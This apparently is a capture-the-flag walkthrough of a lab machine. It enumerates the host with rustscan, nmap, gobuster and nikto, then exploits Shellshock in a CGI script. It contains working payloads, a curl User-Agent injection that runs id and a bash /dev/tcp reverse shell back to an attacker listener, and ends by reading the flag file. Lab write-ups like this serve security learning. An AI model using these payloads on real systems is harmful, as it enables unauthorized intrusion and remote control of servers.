┌──(kali㉿GNOME)-[~]
└─$ rustscan -a 192.168.76.87
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
┌──(kali㉿GNOME)-[~]
└─$ nmap -sC -sV 192.168.76.87 -p 22,80
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA)
| 2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA)
|_ 256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The index page has nothing useful, so we fuzz for directories.
┌──(kali㉿GNOME)-[~]
└─$ gobuster dir -u http://192.168.76.87/ -w /usr/share/wordlists/dirb/common.txt -q -t 100
/.htpasswd (Status: 403) [Size: 290]
/.htaccess (Status: 403) [Size: 290]
/.hta (Status: 403) [Size: 285]
/cgi-bin/ (Status: 403) [Size: 289]
/index (Status: 200) [Size: 177]
/index.html (Status: 200) [Size: 177]
/server-status (Status: 403) [Size: 294]
There is a /cgi-bin directory, so we fuzz inside it as well.
┌──(kali㉿GNOME)-[~]
└─$ gobuster dir -u http://192.168.76.87/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -q -t 100
/.htpasswd (Status: 403) [Size: 298]
/.htaccess (Status: 403) [Size: 298]
/.hta (Status: 403) [Size: 293]
/test (Status: 200) [Size: 14]
While I was doing the manual scan, my automated Nikto scan completed.
┌──(kali㉿GNOME)-[~]
└─$ nikto -h 192.168.76.87
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.76.87
+ Target Hostname: 192.168.76.87
+ Target Port: 80
+ Start Time: 2022-06-21 18:11:15 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Tue May 12 01:55:10 2020
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS.
From the Nikto output we can see that the site appears vulnerable to Shellshock (CVE-2014-6271): the CGI script at /cgi-bin/test is handled by a bash that still imports function definitions from environment variables such as HTTP_USER_AGENT. Nikto only says "appears", so the next step is to confirm real command execution.
From this https://www.sevenlayers.com/index.php/blog/340-vulnhub-sumo-1-walkthrough writeup I found this command, which injects a command directly into the vulnerable Shellshock server:
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://192.168.76.87/cgi-bin/test/test.cgi
┌──(kali㉿GNOME)-[~]
└─$ curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://192.168.76.87/cgi-bin/test/test.cgi
uid=33(www-data) gid=33(www-data) groups=33(www-data)
The id output comes back as www-data, so the injected command really ran. Now we can get a reverse shell: start the nc listener first, then send the payload from another terminal, because the curl request stays open for as long as the interactive shell is alive.
┌──(kali㉿GNOME)-[~]
└─$ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.49.76/1234 0>&1' http://192.168.76.87/cgi-bin/test/test.cgi
┌──(kali㉿GNOME)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.49.76] from (UNKNOWN) [192.168.76.87] 42516
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$ whoami
www-data
www-data@ubuntu:/usr/lib/cgi-bin$ cat local.txt
31b8f9af83414d6cc25a31aa896eaf8e